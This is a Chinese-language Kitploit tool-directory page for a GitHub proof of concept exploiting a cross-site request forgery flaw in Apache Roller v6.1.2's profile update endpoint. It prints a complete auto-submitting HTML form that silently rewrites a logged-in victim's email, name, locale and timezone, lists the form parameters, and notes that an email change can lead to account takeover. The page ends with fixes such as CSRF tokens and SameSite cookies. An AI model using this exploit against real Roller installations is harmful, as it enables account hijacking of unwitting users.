Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
roller-csrf — 针对Apache Roller v6.1.2配置文件更新端点的CSRF漏洞的PoC利用代码。包含HTML表单利用代码,用于演示未经授权的配置文件更改。 | Kitploit
工具/GitHubGitHub/vanlam2001/roller-csrf
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubvanlam2001/roller-csrf

roller-csrf

针对Apache Roller v6.1.2配置文件更新端点的CSRF漏洞的PoC利用代码。包含HTML表单利用代码,用于演示未经授权的配置文件更改。

查看仓库
9个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Apache Roller v6.1.2 - 配置文件更新中的跨站请求伪造 (CSRF)

漏洞详情

  • 版本: v6.1.2
  • 日期: 2025-11-09
  • 漏洞发现者: Van Lam Nguyen
  • Facebook: https://www.facebook.com/vanlam1412
  • 厂商主页: https://roller.apache.org
  • 软件链接: https://github.com/apache/roller/archive/refs/tags/roller-6.1.2.zip
  • 测试环境: Windows
  • CVE: 无
  • 演示: https://youtu.be/iPEiVzcpJJU

概述

Roller v6.1.2 及以下版本被发现其端点 /roller/roller-ui/profile!save.rol 存在跨站请求伪造 (CSRF) 漏洞。

该漏洞允许攻击者通过精心构造的 HTML 页面,任意修改受害用户的个人信息(例如电子邮件、全名、区域设置、时区)。

概念验证

该漏洞允许未经授权的请求发送至 /roller/roller-ui/profile!save.rol,从而在缺乏 CSRF 保护的情况下更新用户配置文件。

HTML 利用代码

root@kitploit:~
<html>
<head>
    <form id="exploitForm" action="http://localhost:8080/roller/roller-ui/profile!save.rol" method="POST">
        <input name="bean.userName" value="vanlam" type="hidden">
        <input name="bean.screenName" value="hacked" type="hidden">
        <input name="bean.fullName" value="hacked" type="hidden">
        <input name="bean.emailAddress" value="[email protected]" type="hidden">
        <input name="bean.passwordText" value="" type="hidden">
        <input name="bean.passwordConfirm" value="" type="hidden">
        <input name="bean.locale" value="vi_VN" type="hidden">
        <input name="bean.timeZone" value="Asia/Bangkok" type="hidden">
    </form>

    <script>
        document.getElementById('exploitForm').submit();
    </script>
</head>
</html>

表单参数

  • bean.userName: vanlam
  • bean.screenName: hacked
  • bean.fullName: hacked
  • bean.emailAddress: [email protected]
  • bean.passwordText: (空)
  • bean.passwordConfirm: (空)
  • bean.locale: vi_VN
  • bean.timeZone: Asia/Bangkok

影响

攻击者可以构造一个恶意 HTML 页面,当已认证的 Roller 用户访问该页面时,会自动提交表单来修改受害者的个人信息,而无需用户同意。这可能造成:

  • 用户配置文件数据被未授权修改
  • 若电子邮件地址被更改,可能导致账户被接管
  • 通过修改区域设置和时区破坏用户体验

修复建议

  • 对所有状态变更的请求实施 CSRF 令牌
  • 验证 Origin 和 Referer 请求头
  • 使用同站点 Cookie
  • 实施正确的认证和授权检查
下载工具